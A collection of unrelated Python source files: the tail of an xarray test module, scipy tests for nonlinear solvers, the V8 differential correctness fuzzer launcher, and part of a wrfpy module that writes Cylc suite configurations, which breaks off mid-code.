expected = dedent(
"""\
Reduce this DataArray's data by applying `sum` along some dimension(s).
Parameters
----------
dim : str or sequence of str, optional
Dimension(s) over which to apply `sum`.
axis : int or sequence of int, optional
Axis(es) over which to apply `sum`. Only one of the 'dim'
and 'axis' arguments can be supplied. If neither are supplied, then
`sum` is calculated over axes.
skipna : bool, optional
If True, skip missing values (as marked by NaN). By default, only
skips missing values for float dtypes; other dtypes either do not
have a sentinel missing value (int) or skipna=True has not been
implemented (object, datetime64 or timedelta64).
min_count : int, default None
The required number of valid values to perform the operation.
If fewer than min_count non-NA values are present the result will
be NA. New in version 0.10.8: Added with the default being None.
keep_attrs : bool, optional
If True, the attributes (`attrs`) will be copied from the original
object to the new one. If False (default), the new object will be
returned without attributes.
**kwargs : dict
Additional keyword arguments passed on to the appropriate array
function for calculating `sum` on this object's data.
Returns
-------
reduced : DataArray
New DataArray object with `sum` applied to its data and the
indicated dimension(s) removed.
"""
)
assert actual == expected
# without min_count
actual = DataArray.std.__doc__
expected = dedent(
"""\
Reduce this DataArray's data by applying `std` along some dimension(s).
Parameters
----------
dim : str or sequence of str, optional
Dimension(s) over which to apply `std`.
axis : int or sequence of int, optional
Axis(es) over which to apply `std`. Only one of the 'dim'
and 'axis' arguments can be supplied. If neither are supplied, then
`std` is calculated over axes.
skipna : bool, optional
If True, skip missing values (as marked by NaN). By default, only
skips missing values for float dtypes; other dtypes either do not
have a sentinel missing value (int) or skipna=True has not been
implemented (object, datetime64 or timedelta64).
keep_attrs : bool, optional
If True, the attributes (`attrs`) will be copied from the original
object to the new one. If False (default), the new object will be
returned without attributes.
**kwargs : dict
Additional keyword arguments passed on to the appropriate array
function for calculating `std` on this object's data.
Returns
-------
reduced : DataArray
New DataArray object with `std` applied to its data and the
indicated dimension(s) removed.
"""
)
assert actual == expected
def test_datetime_to_numeric_datetime64():
times = pd.date_range("2000", periods=5, freq="7D").values
result = duck_array_ops.datetime_to_numeric(times, datetime_unit="h")
expected = 24 * np.arange(0, 35, 7)
np.testing.assert_array_equal(result, expected)
offset = times[1]
result = duck_array_ops.datetime_to_numeric(times, offset=offset, datetime_unit="h")
expected = 24 * np.arange(-7, 28, 7)
np.testing.assert_array_equal(result, expected)
dtype = np.float32
result = duck_array_ops.datetime_to_numeric(times, datetime_unit="h", dtype=dtype)
expected = 24 * np.arange(0, 35, 7).astype(dtype)
np.testing.assert_array_equal(result, expected)
@requires_cftime
def test_datetime_to_numeric_cftime():
times = cftime_range("2000", periods=5, freq="7D").values
result = duck_array_ops.datetime_to_numeric(times, datetime_unit="h")
expected = 24 * np.arange(0, 35, 7)
np.testing.assert_array_equal(result, expected)
offset = times[1]
result = duck_array_ops.datetime_to_numeric(times, offset=offset, datetime_unit="h")
expected = 24 * np.arange(-7, 28, 7)
np.testing.assert_array_equal(result, expected)
dtype = np.float32
result = duck_array_ops.datetime_to_numeric(times, datetime_unit="h", dtype=dtype)
expected = 24 * np.arange(0, 35, 7).astype(dtype)
np.testing.assert_array_equal(result, expected)
| |
""" Unit tests for nonlinear solvers
Author: Ondrej Certik
May 2007
"""
from __future__ import division, print_function, absolute_import
from numpy.testing import assert_, dec, TestCase, run_module_suite
from scipy.lib.six import xrange
from scipy.optimize import nonlin, root
from numpy import matrix, diag, dot
from numpy.linalg import inv
import numpy as np
from test_minpack import pressure_network
SOLVERS = {'anderson': nonlin.anderson, 'diagbroyden': nonlin.diagbroyden,
'linearmixing': nonlin.linearmixing, 'excitingmixing': nonlin.excitingmixing,
'broyden1': nonlin.broyden1, 'broyden2': nonlin.broyden2,
'krylov': nonlin.newton_krylov}
MUST_WORK = {'anderson': nonlin.anderson, 'broyden1': nonlin.broyden1,
'broyden2': nonlin.broyden2, 'krylov': nonlin.newton_krylov}
#-------------------------------------------------------------------------------
# Test problems
#-------------------------------------------------------------------------------
def F(x):
x = np.asmatrix(x).T
d = matrix(diag([3,2,1.5,1,0.5]))
c = 0.01
f = -d*x - c*float(x.T*x)*x
return f
F.xin = [1,1,1,1,1]
F.KNOWN_BAD = {}
def F2(x):
return x
F2.xin = [1,2,3,4,5,6]
F2.KNOWN_BAD = {'linearmixing': nonlin.linearmixing,
'excitingmixing': nonlin.excitingmixing}
def F3(x):
A = np.mat('-2 1 0; 1 -2 1; 0 1 -2')
b = np.mat('1 2 3')
return np.dot(A, x) - b
F3.xin = [1,2,3]
F3.KNOWN_BAD = {}
def F4_powell(x):
A = 1e4
return [A*x[0]*x[1] - 1, np.exp(-x[0]) + np.exp(-x[1]) - (1 + 1/A)]
F4_powell.xin = [-1, -2]
F4_powell.KNOWN_BAD = {'linearmixing': nonlin.linearmixing,
'excitingmixing': nonlin.excitingmixing,
'diagbroyden': nonlin.diagbroyden}
def F5(x):
return pressure_network(x, 4, np.array([.5, .5, .5, .5]))
F5.xin = [2., 0, 2, 0]
F5.KNOWN_BAD = {'excitingmixing': nonlin.excitingmixing,
'linearmixing': nonlin.linearmixing,
'diagbroyden': nonlin.diagbroyden}
def F6(x):
x1, x2 = x
J0 = np.array([[-4.256, 14.7],
[0.8394989, 0.59964207]])
v = np.array([(x1 + 3) * (x2**5 - 7) + 3*6,
np.sin(x2 * np.exp(x1) - 1)])
return -np.linalg.solve(J0, v)
F6.xin = [-0.5, 1.4]
F6.KNOWN_BAD = {'excitingmixing': nonlin.excitingmixing,
'linearmixing': nonlin.linearmixing,
'diagbroyden': nonlin.diagbroyden}
#-------------------------------------------------------------------------------
# Tests
#-------------------------------------------------------------------------------
class TestNonlin(object):
"""
Check the Broyden methods for a few test problems.
broyden1, broyden2, and newton_krylov must succeed for
all functions. Some of the others don't -- tests in KNOWN_BAD are skipped.
"""
def _check_nonlin_func(self, f, func, f_tol=1e-2):
x = func(f, f.xin, f_tol=f_tol, maxiter=200, verbose=0)
assert_(np.absolute(f(x)).max() < f_tol)
def _check_root(self, f, method, f_tol=1e-2):
res = root(f, f.xin, method=method,
options={'ftol': f_tol, 'maxiter': 200, 'disp': 0})
assert_(np.absolute(res.fun).max() < f_tol)
@dec.knownfailureif(True)
def _check_func_fail(self, *a, **kw):
pass
def test_problem_nonlin(self):
""" Tests for nonlin functions """
for f in [F, F2, F3, F4_powell, F5, F6]:
for func in SOLVERS.values():
if func in f.KNOWN_BAD.values():
if func in MUST_WORK.values():
yield self._check_func_fail, f, func
continue
yield self._check_nonlin_func, f, func
def test_problem_root(self):
""" Tests for root """
for f in [F, F2, F3, F4_powell, F5, F6]:
for meth in SOLVERS:
if meth in f.KNOWN_BAD:
if meth in MUST_WORK:
yield self._check_func_fail, f, meth
continue
yield self._check_root, f, meth
class TestSecant(TestCase):
"""Check that some Jacobian approximations satisfy the secant condition"""
xs = [np.array([1,2,3,4,5], float),
np.array([2,3,4,5,1], float),
np.array([3,4,5,1,2], float),
np.array([4,5,1,2,3], float),
np.array([9,1,9,1,3], float),
np.array([0,1,9,1,3], float),
np.array([5,5,7,1,1], float),
np.array([1,2,7,5,1], float),]
fs = [x**2 - 1 for x in xs]
def _check_secant(self, jac_cls, npoints=1, **kw):
"""
Check that the given Jacobian approximation satisfies secant
conditions for last `npoints` points.
"""
jac = jac_cls(**kw)
jac.setup(self.xs[0], self.fs[0], None)
for j, (x, f) in enumerate(zip(self.xs[1:], self.fs[1:])):
jac.update(x, f)
for k in xrange(min(npoints, j+1)):
dx = self.xs[j-k+1] - self.xs[j-k]
df = self.fs[j-k+1] - self.fs[j-k]
assert_(np.allclose(dx, jac.solve(df)))
# Check that the `npoints` secant bound is strict
if j >= npoints:
dx = self.xs[j-npoints+1] - self.xs[j-npoints]
df = self.fs[j-npoints+1] - self.fs[j-npoints]
assert_(not np.allclose(dx, jac.solve(df)))
def test_broyden1(self):
self._check_secant(nonlin.BroydenFirst)
def test_broyden2(self):
self._check_secant(nonlin.BroydenSecond)
def test_broyden1_update(self):
# Check that BroydenFirst update works as for a dense matrix
jac = nonlin.BroydenFirst(alpha=0.1)
jac.setup(self.xs[0], self.fs[0], None)
B = np.identity(5) * (-1/0.1)
for last_j, (x, f) in enumerate(zip(self.xs[1:], self.fs[1:])):
df = f - self.fs[last_j]
dx = x - self.xs[last_j]
B += (df - dot(B, dx))[:,None] * dx[None,:] / dot(dx, dx)
jac.update(x, f)
assert_(np.allclose(jac.todense(), B, rtol=1e-10, atol=1e-13))
def test_broyden2_update(self):
# Check that BroydenSecond update works as for a dense matrix
jac = nonlin.BroydenSecond(alpha=0.1)
jac.setup(self.xs[0], self.fs[0], None)
H = np.identity(5) * (-0.1)
for last_j, (x, f) in enumerate(zip(self.xs[1:], self.fs[1:])):
df = f - self.fs[last_j]
dx = x - self.xs[last_j]
H += (dx - dot(H, df))[:,None] * df[None,:] / dot(df, df)
jac.update(x, f)
assert_(np.allclose(jac.todense(), inv(H), rtol=1e-10, atol=1e-13))
def test_anderson(self):
# Anderson mixing (with w0=0) satisfies secant conditions
# for the last M iterates, see [Ey]_
#
# .. [Ey] V. Eyert, J. Comp. Phys., 124, 271 (1996).
self._check_secant(nonlin.Anderson, M=3, w0=0, npoints=3)
class TestLinear(TestCase):
"""Solve a linear equation;
some methods find the exact solution in a finite number of steps"""
def _check(self, jac, N, maxiter, complex=False, **kw):
np.random.seed(123)
A = np.random.randn(N, N)
if complex:
A = A + 1j*np.random.randn(N, N)
b = np.random.randn(N)
if complex:
b = b + 1j*np.random.randn(N)
def func(x):
return dot(A, x) - b
sol = nonlin.nonlin_solve(func, np.zeros(N), jac, maxiter=maxiter,
f_tol=1e-6, line_search=None, verbose=0)
assert_(np.allclose(dot(A, sol), b, atol=1e-6))
def test_broyden1(self):
# Broyden methods solve linear systems exactly in 2*N steps
self._check(nonlin.BroydenFirst(alpha=1.0), 20, 41, False)
self._check(nonlin.BroydenFirst(alpha=1.0), 20, 41, True)
def test_broyden2(self):
# Broyden methods solve linear systems exactly in 2*N steps
self._check(nonlin.BroydenSecond(alpha=1.0), 20, 41, False)
self._check(nonlin.BroydenSecond(alpha=1.0), 20, 41, True)
def test_anderson(self):
# Anderson is rather similar to Broyden, if given enough storage space
self._check(nonlin.Anderson(M=50, alpha=1.0), 20, 29, False)
self._check(nonlin.Anderson(M=50, alpha=1.0), 20, 29, True)
def test_krylov(self):
# Krylov methods solve linear systems exactly in N inner steps
self._check(nonlin.KrylovJacobian, 20, 2, False, inner_m=10)
self._check(nonlin.KrylovJacobian, 20, 2, True, inner_m=10)
class TestJacobianDotSolve(object):
"""Check that solve/dot methods in Jacobian approximations are consistent"""
def _func(self, x):
return x**2 - 1 + np.dot(self.A, x)
def _check_dot(self, jac_cls, complex=False, tol=1e-6, **kw):
np.random.seed(123)
N = 7
def rand(*a):
q = np.random.rand(*a)
if complex:
q = q + 1j*np.random.rand(*a)
return q
def assert_close(a, b, msg):
d = abs(a - b).max()
f = tol + abs(b).max()*tol
if d > f:
raise AssertionError('%s: err %g' % (msg, d))
self.A = rand(N, N)
# initialize
x0 = np.random.rand(N)
jac = jac_cls(**kw)
jac.setup(x0, self._func(x0), self._func)
# check consistency
for k in xrange(2*N):
v = rand(N)
if hasattr(jac, '__array__'):
Jd = np.array(jac)
if hasattr(jac, 'solve'):
Gv = jac.solve(v)
Gv2 = np.linalg.solve(Jd, v)
assert_close(Gv, Gv2, 'solve vs array')
if hasattr(jac, 'rsolve'):
Gv = jac.rsolve(v)
Gv2 = np.linalg.solve(Jd.T.conj(), v)
assert_close(Gv, Gv2, 'rsolve vs array')
if hasattr(jac, 'matvec'):
Jv = jac.matvec(v)
Jv2 = np.dot(Jd, v)
assert_close(Jv, Jv2, 'dot vs array')
if hasattr(jac, 'rmatvec'):
Jv = jac.rmatvec(v)
Jv2 = np.dot(Jd.T.conj(), v)
assert_close(Jv, Jv2, 'rmatvec vs array')
if hasattr(jac, 'matvec') and hasattr(jac, 'solve'):
Jv = jac.matvec(v)
Jv2 = jac.solve(jac.matvec(Jv))
assert_close(Jv, Jv2, 'dot vs solve')
if hasattr(jac, 'rmatvec') and hasattr(jac, 'rsolve'):
Jv = jac.rmatvec(v)
Jv2 = jac.rmatvec(jac.rsolve(Jv))
assert_close(Jv, Jv2, 'rmatvec vs rsolve')
x = rand(N)
jac.update(x, self._func(x))
def test_broyden1(self):
self._check_dot(nonlin.BroydenFirst, complex=False)
self._check_dot(nonlin.BroydenFirst, complex=True)
def test_broyden2(self):
self._check_dot(nonlin.BroydenSecond, complex=False)
self._check_dot(nonlin.BroydenSecond, complex=True)
def test_anderson(self):
self._check_dot(nonlin.Anderson, complex=False)
self._check_dot(nonlin.Anderson, complex=True)
def test_diagbroyden(self):
self._check_dot(nonlin.DiagBroyden, complex=False)
self._check_dot(nonlin.DiagBroyden, complex=True)
def test_linearmixing(self):
self._check_dot(nonlin.LinearMixing, complex=False)
self._check_dot(nonlin.LinearMixing, complex=True)
def test_excitingmixing(self):
self._check_dot(nonlin.ExcitingMixing, complex=False)
self._check_dot(nonlin.ExcitingMixing, complex=True)
def test_krylov(self):
self._check_dot(nonlin.KrylovJacobian, complex=False, tol=1e-4)
self._check_dot(nonlin.KrylovJacobian, complex=True, tol=1e-4)
class TestNonlinOldTests(TestCase):
""" Test case for a simple constrained entropy maximization problem
(the machine translation example of Berger et al in
Computational Linguistics, vol 22, num 1, pp 39--72, 1996.)
"""
def test_broyden1(self):
x = nonlin.broyden1(F,F.xin,iter=12,alpha=1)
assert_(nonlin.norm(x) < 1e-9)
assert_(nonlin.norm(F(x)) < 1e-9)
def test_broyden2(self):
x = nonlin.broyden2(F,F.xin,iter=12,alpha=1)
assert_(nonlin.norm(x) < 1e-9)
assert_(nonlin.norm(F(x)) < 1e-9)
def test_anderson(self):
x = nonlin.anderson(F,F.xin,iter=12,alpha=0.03,M=5)
assert_(nonlin.norm(x) < 0.33)
def test_linearmixing(self):
x = nonlin.linearmixing(F,F.xin,iter=60,alpha=0.5)
assert_(nonlin.norm(x) < 1e-7)
assert_(nonlin.norm(F(x)) < 1e-7)
def test_exciting(self):
x = nonlin.excitingmixing(F,F.xin,iter=20,alpha=0.5)
assert_(nonlin.norm(x) < 1e-5)
assert_(nonlin.norm(F(x)) < 1e-5)
def test_diagbroyden(self):
x = nonlin.diagbroyden(F,F.xin,iter=11,alpha=1)
assert_(nonlin.norm(x) < 1e-8)
assert_(nonlin.norm(F(x)) < 1e-8)
def test_root_broyden1(self):
res = root(F, F.xin, method='broyden1',
options={'nit': 12, 'jac_options': {'alpha': 1}})
assert_(nonlin.norm(res.x) < 1e-9)
assert_(nonlin.norm(res.fun) < 1e-9)
def test_root_broyden2(self):
res = root(F, F.xin, method='broyden2',
options={'nit': 12, 'jac_options': {'alpha': 1}})
assert_(nonlin.norm(res.x) < 1e-9)
assert_(nonlin.norm(res.fun) < 1e-9)
def test_root_anderson(self):
res = root(F, F.xin, method='anderson',
options={'nit': 12,
'jac_options': {'alpha': 0.03, 'M': 5}})
assert_(nonlin.norm(res.x) < 0.33)
def test_root_linearmixing(self):
res = root(F, F.xin, method='linearmixing',
options={'nit': 60,
'jac_options': {'alpha': 0.5}})
assert_(nonlin.norm(res.x) < 1e-7)
assert_(nonlin.norm(res.fun) < 1e-7)
def test_root_excitingmixing(self):
res = root(F, F.xin, method='excitingmixing',
options={'nit': 20,
'jac_options': {'alpha': 0.5}})
assert_(nonlin.norm(res.x) < 1e-5)
assert_(nonlin.norm(res.fun) < 1e-5)
def test_root_diagbroyden(self):
res = root(F, F.xin, method='diagbroyden',
options={'nit': 11,
'jac_options': {'alpha': 1}})
assert_(nonlin.norm(res.x) < 1e-8)
assert_(nonlin.norm(res.fun) < 1e-8)
if __name__ == "__main__":
run_module_suite()
| |
#!/usr/bin/env python
# Copyright 2016 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
V8 correctness fuzzer launcher script.
"""
import argparse
import hashlib
import itertools
import json
import os
import re
import sys
import traceback
import v8_commands
import v8_suppressions
CONFIGS = dict(
default=[
'--suppress-asm-messages',
],
ignition=[
'--turbo-filter=~',
'--noopt',
'--suppress-asm-messages',
],
ignition_asm=[
'--turbo-filter=~',
'--noopt',
'--validate-asm',
'--stress-validate-asm',
'--suppress-asm-messages',
],
ignition_eager=[
'--turbo-filter=~',
'--noopt',
'--no-lazy',
'--no-lazy-inner-functions',
'--suppress-asm-messages',
],
ignition_turbo=[
'--suppress-asm-messages',
],
ignition_turbo_opt=[
'--always-opt',
'--suppress-asm-messages',
],
ignition_turbo_opt_eager=[
'--always-opt',
'--no-lazy',
'--no-lazy-inner-functions',
'--suppress-asm-messages',
],
)
# Timeout in seconds for one d8 run.
TIMEOUT = 3
# Return codes.
RETURN_PASS = 0
RETURN_FAIL = 2
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
PREAMBLE = [
os.path.join(BASE_PATH, 'v8_mock.js'),
os.path.join(BASE_PATH, 'v8_suppressions.js'),
]
ARCH_MOCKS = os.path.join(BASE_PATH, 'v8_mock_archs.js')
FLAGS = ['--abort_on_stack_or_string_length_overflow', '--expose-gc',
'--allow-natives-syntax', '--invoke-weak-callbacks', '--omit-quit',
'--es-staging']
SUPPORTED_ARCHS = ['ia32', 'x64', 'arm', 'arm64']
# Output for suppressed failure case.
FAILURE_HEADER_TEMPLATE = """#
# V8 correctness failure
# V8 correctness configs: %(configs)s
# V8 correctness sources: %(source_key)s
# V8 correctness suppression: %(suppression)s
"""
# Extended output for failure case. The 'CHECK' is for the minimizer.
FAILURE_TEMPLATE = FAILURE_HEADER_TEMPLATE + """#
# CHECK
#
# Compared %(first_config_label)s with %(second_config_label)s
#
# Flags of %(first_config_label)s:
%(first_config_flags)s
# Flags of %(second_config_label)s:
%(second_config_flags)s
#
# Difference:
%(difference)s
#
# Source file:
%(source)s
#
### Start of configuration %(first_config_label)s:
%(first_config_output)s
### End of configuration %(first_config_label)s
#
### Start of configuration %(second_config_label)s:
%(second_config_output)s
### End of configuration %(second_config_label)s
"""
FUZZ_TEST_RE = re.compile(r'.*fuzz(-\d+\.js)')
SOURCE_RE = re.compile(r'print\("v8-foozzie source: (.*)"\);')
# The number of hex digits used from the hash of the original source file path.
# Keep the number small to avoid duplicate explosion.
ORIGINAL_SOURCE_HASH_LENGTH = 3
# Placeholder string if no original source file could be determined.
ORIGINAL_SOURCE_DEFAULT = 'none'
def infer_arch(d8):
"""Infer the V8 architecture from the build configuration next to the
executable.
"""
with open(os.path.join(os.path.dirname(d8), 'v8_build_config.json')) as f:
arch = json.load(f)['v8_target_cpu']
return 'ia32' if arch == 'x86' else arch
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--random-seed', type=int, required=True,
help='random seed passed to both runs')
parser.add_argument(
'--first-config', help='first configuration', default='ignition')
parser.add_argument(
'--second-config', help='second configuration', default='ignition_turbo')
parser.add_argument(
'--first-d8', default='d8',
help='optional path to first d8 executable, '
'default: bundled in the same directory as this script')
parser.add_argument(
'--second-d8',
help='optional path to second d8 executable, default: same as first')
parser.add_argument('testcase', help='path to test case')
options = parser.parse_args()
# Ensure we have a test case.
assert (os.path.exists(options.testcase) and
os.path.isfile(options.testcase)), (
'Test case %s doesn\'t exist' % options.testcase)
# Use first d8 as default for second d8.
options.second_d8 = options.second_d8 or options.first_d8
# Ensure absolute paths.
if not os.path.isabs(options.first_d8):
options.first_d8 = os.path.join(BASE_PATH, options.first_d8)
if not os.path.isabs(options.second_d8):
options.second_d8 = os.path.join(BASE_PATH, options.second_d8)
# Ensure executables exist.
assert os.path.exists(options.first_d8)
assert os.path.exists(options.second_d8)
# Infer architecture from build artifacts.
options.first_arch = infer_arch(options.first_d8)
options.second_arch = infer_arch(options.second_d8)
# Ensure we make a sane comparison.
assert (options.first_arch != options.second_arch or
options.first_config != options.second_config), (
'Need either arch or config difference.')
assert options.first_arch in SUPPORTED_ARCHS
assert options.second_arch in SUPPORTED_ARCHS
assert options.first_config in CONFIGS
assert options.second_config in CONFIGS
return options
def get_meta_data(content):
"""Extracts original-source-file paths from test case content."""
sources = []
for line in content.splitlines():
match = SOURCE_RE.match(line)
if match:
sources.append(match.group(1))
return {'sources': sources}
def content_bailout(content, ignore_fun):
"""Print failure state and return if ignore_fun matches content."""
bug = (ignore_fun(content) or '').strip()
if bug:
print FAILURE_HEADER_TEMPLATE % dict(
configs='', source_key='', suppression=bug)
return True
return False
def pass_bailout(output, step_number):
"""Print info and return if in timeout or crash pass states."""
if output.HasTimedOut():
# Dashed output, so that no other clusterfuzz tools can match the
# words timeout or crash.
print '# V8 correctness - T-I-M-E-O-U-T %d' % step_number
return True
if output.HasCrashed():
print '# V8 correctness - C-R-A-S-H %d' % step_number
return True
return False
def fail_bailout(output, ignore_by_output_fun):
"""Print failure state and return if ignore_by_output_fun matches output."""
bug = (ignore_by_output_fun(output.stdout) or '').strip()
if bug:
print FAILURE_HEADER_TEMPLATE % dict(
configs='', source_key='', suppression=bug)
return True
return False
def main():
options = parse_args()
# Suppressions are architecture and configuration specific.
suppress = v8_suppressions.get_suppression(
options.first_arch, options.first_config,
options.second_arch, options.second_config,
)
# Static bailout based on test case content or metadata.
with open(options.testcase) as f:
content = f.read()
if content_bailout(get_meta_data(content), suppress.ignore_by_metadata):
return RETURN_FAIL
if content_bailout(content, suppress.ignore_by_content):
return RETURN_FAIL
# Set up runtime arguments.
common_flags = FLAGS + ['--random-seed', str(options.random_seed)]
first_config_flags = common_flags + CONFIGS[options.first_config]
second_config_flags = common_flags + CONFIGS[options.second_config]
def run_d8(d8, config_flags):
preamble = PREAMBLE[:]
if options.first_arch != options.second_arch:
preamble.append(ARCH_MOCKS)
args = [d8] + config_flags + preamble + [options.testcase]
print " ".join(args)
if d8.endswith('.py'):
# Wrap with python in tests.
args = [sys.executable] + args
return v8_commands.Execute(
args,
cwd=os.path.dirname(options.testcase),
timeout=TIMEOUT,
)
first_config_output = run_d8(options.first_d8, first_config_flags)
# Early bailout based on first run's output.
if pass_bailout(first_config_output, 1):
return RETURN_PASS
second_config_output = run_d8(options.second_d8, second_config_flags)
# Bailout based on second run's output.
if pass_bailout(second_config_output, 2):
return RETURN_PASS
difference, source = suppress.diff(
first_config_output.stdout, second_config_output.stdout)
if source:
source_key = hashlib.sha1(source).hexdigest()[:ORIGINAL_SOURCE_HASH_LENGTH]
else:
source = ORIGINAL_SOURCE_DEFAULT
source_key = ORIGINAL_SOURCE_DEFAULT
if difference:
# Only bail out due to suppressed output if there was a difference. If a
# suppression doesn't show up anymore in the statistics, we might want to
# remove it.
if fail_bailout(first_config_output, suppress.ignore_by_output1):
return RETURN_FAIL
if fail_bailout(second_config_output, suppress.ignore_by_output2):
return RETURN_FAIL
# The first three entries will be parsed by clusterfuzz. Format changes
# will require changes on the clusterfuzz side.
first_config_label = '%s,%s' % (options.first_arch, options.first_config)
second_config_label = '%s,%s' % (options.second_arch, options.second_config)
print (FAILURE_TEMPLATE % dict(
configs='%s:%s' % (first_config_label, second_config_label),
source_key=source_key,
suppression='', # We can't tie bugs to differences.
first_config_label=first_config_label,
second_config_label=second_config_label,
first_config_flags=' '.join(first_config_flags),
second_config_flags=' '.join(second_config_flags),
first_config_output=
first_config_output.stdout.decode('utf-8', 'replace'),
second_config_output=
second_config_output.stdout.decode('utf-8', 'replace'),
source=source,
difference=difference.decode('utf-8', 'replace'),
)).encode('utf-8', 'replace')
return RETURN_FAIL
# TODO(machenbach): Figure out if we could also return a bug in case there's
# no difference, but one of the line suppressions has matched - and without
# the match there would be a difference.
print '# V8 correctness - pass'
return RETURN_PASS
if __name__ == "__main__":
try:
result = main()
except SystemExit:
# Make sure clusterfuzz reports internal errors and wrong usage.
# Use one label for all internal and usage errors.
print FAILURE_HEADER_TEMPLATE % dict(
configs='', source_key='', suppression='wrong_usage')
result = RETURN_FAIL
except MemoryError:
# Running out of memory happens occasionally but is not actionable.
print '# V8 correctness - pass'
result = RETURN_PASS
except Exception as e:
print FAILURE_HEADER_TEMPLATE % dict(
configs='', source_key='', suppression='internal_error')
print '# Internal error: %s' % e
traceback.print_exc(file=sys.stdout)
result = RETURN_FAIL
sys.exit(result)
| |
#!/usr/bin/env python
'''
description: Configuration part of wrfpy
license: APACHE 2.0
author: Ronald van Haren, NLeSC (r.vanharen@esciencecenter.nl)
'''
from wrfpy.config import config
from wrfpy import utils
import os
from distutils.dir_util import copy_tree
import pkg_resources
class configuration(config):
def __init__(self, results):
global logger
logger = utils.start_logging(os.path.join(os.path.expanduser("~"),
'wrfpy.log'))
if results['init']:
self._create_directory_structure(results['suitename'],
results['basedir'])
elif results['create']:
self._create_cylc_config(results['suitename'],
results['basedir'])
def _create_directory_structure(self, suitename, basedir=None):
'''
Create directory structure for the Cylc configuration
'''
# set basedir to users home directory if not supplied
if not basedir:
basedir = os.path.join(os.path.expanduser("~"), 'cylc-suites')
# subdirectories to create
subdirs = ['bin', 'control', 'doc', 'inc']
# create subdirectories
[utils._create_directory(
os.path.join(basedir, suitename, subdir))
for subdir in subdirs]
# copy over helper scripts for cylc
cylcDir = pkg_resources.resource_filename('wrfpy', 'cylc/')
targetDir = os.path.join(basedir, suitename, 'bin')
copy_tree(cylcDir, targetDir)
# create empty json config file in suite directory
# this does not overwrite an existing config file
config.__init__(self, os.path.join(
basedir, suitename, 'config.json'))
def _create_cylc_config(self, suitename, basedir):
'''
Create cylc suite.rc configuration file based on config.json
'''
config.__init__(self, os.path.join(
basedir, suitename, 'config.json'))
self.incr_hour = self.config['options_general']['run_hours']
self.wps_interval_hours = self.config['options_wps']['run_hours']
suiterc = self._header()
suiterc += self._scheduling()
suiterc += self._runtime()
suiterc += self._visualization()
self._write(suiterc, os.path.join(basedir, suitename, 'suite.rc'))
def _header(self):
'''
define suite.rc header information
'''
start_time = utils.datetime_to_string(
utils.return_validate(self.config[
'options_general']['date_start']),
format='%Y%m%dT%H')
end_time = utils.datetime_to_string(
utils.return_validate(self.config['options_general']['date_end']),
format='%Y%m%dT%H')
# define template
template = """#!Jinja2
{{% set START = "{start_time}" %}}
{{% set STOP = "{end_time}" %}}
"""
# context variables in template
context = {
"start_time": start_time,
"end_time": end_time
}
return template.format(**context)
def _scheduling(self):
'''
define suite.rc scheduling information
'''
# get start_hour and increment time from config.json
start_hour = str(
utils.return_validate
(self.config['options_general']['date_start']).hour).zfill(2)
# check if we need to add upp
try:
if self.config['options_upp']['upp']:
uppBlock = "=> upp"
else:
uppBlock = ""
except KeyError:
uppBlock = ""
# define template
template = """[scheduling]
initial cycle point = {{{{ START }}}}
final cycle point = {{{{ STOP }}}}
[[dependencies]]
# Initial cycle point
[[[R1]]]
graph = \"\"\"
wrf_init => wps => wrf_real => wrfda => wrf_run {upp}
obsproc_init => obsproc_run => wrfda
\"\"\"
# Repeat every {incr_hour} hours, starting {incr_hour} hours
# after initial cylce point
[[[+PT{incr_hour}H/PT{incr_hour}H]]]
graph = \"\"\"
wrf_run[-PT{incr_hour}H] => wrf_init => wrf_real => wrfda => wrf_run {upp}
wrfda[-PT{incr_hour}H] => obsproc_init => obsproc_run => wrfda
\"\"\"
# Repeat every {wps_incr_hour} hours, starting {wps_incr_hour} hours
# after initial cylce point
[[[+PT{wps_incr_hour}H/PT{wps_incr_hour}H]]]
graph = \"\"\"
wps[-PT{wps_incr_hour}H] => wps => wrf_init
\"\"\"
"""
# context variables in template
context = {
"start_hour": start_hour,
"incr_hour": self.incr_hour,
"wps_incr_hour": self.wps_interval_hours,
"upp": uppBlock
}
return template.format(**context)
def _runtime(self):
'''
define suite.rc runtime information
'''
return (self._runtime_base() + self._runtime_init_wrf() +
self._runtime_init_obsproc() + self._runtime_real() +
self._runtime_wrf() + self._runtime_obsproc() +
self._runtime_wrfda() + self._runtime_upp() +
self._runtime_wps())
def _runtime_base(self):
'''
define suite.rc runtime information: base
'''
# define template
template = """[runtime]
[[root]] # suite defaults
[[[job submission]]]
method = background
"""
# context variables in template
context = {}
return template.format(**context)
def _runtime_init_wrf(self):
'''
define suite.rc runtime information: init
'''
init_command = "wrf_init.py $CYLC_TASK_CYCLE_POINT {incr_hour}"
init_context = {
"incr_hour": self.incr_hour
}
init = init_command.format(**init_context)
# define template
template = """
[[wrf_init]]
script = \"\"\"
{wrf_init}
\"\"\"
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}"""
# context variables in template
context = {
"wrf_init": init,
"method": "background",
"directives": ""
}
return template.format(**context)
def _runtime_init_obsproc(self):
'''
define suite.rc runtime information: init
'''
init = "wrfda_obsproc_init.py $CYLC_TASK_CYCLE_POINT"
# define template
template = """
[[obsproc_init]]
script = \"\"\"
{obsproc_init}
\"\"\"
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}"""
# context variables in template
context = {
"obsproc_init": init,
"method": "background",
"directives": ""
}
return template.format(**context)
def _runtime_real(self):
'''
define suite.rc runtime information: real.exe
'''
wrf_real = "run_real.py"
# define template
template = """
[[wrf_real]]
script = \"\"\"
{wrf_real}
\"\"\"
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}"""
# context variables in template
context = {
"wrf_real": wrf_real,
"method": "background",
"directives": ""
}
return template.format(**context)
def _runtime_wrf(self):
'''
define suite.rc runtime information: wrf.exe
'''
wrf_run = "run_wrf.py"
# define template
template = """
[[wrf_run]]
script = \"\"\"
{wrf_run}
\"\"\"
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}"""
# context variables in template
context = {
"wrf_run": wrf_run,
"method": "background",
"directives": ""
}
return template.format(**context)
def _runtime_obsproc(self):
'''
define suite.rc runtime information: obsproc.exe
'''
obsproc_run = "wrfda_obsproc_run.py $CYLC_TASK_CYCLE_POINT"
# define template
template = """
[[obsproc_run]]
script = \"\"\"
{obsproc_run}
\"\"\"
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}"""
# context variables in template
context = {
"obsproc_run": obsproc_run,
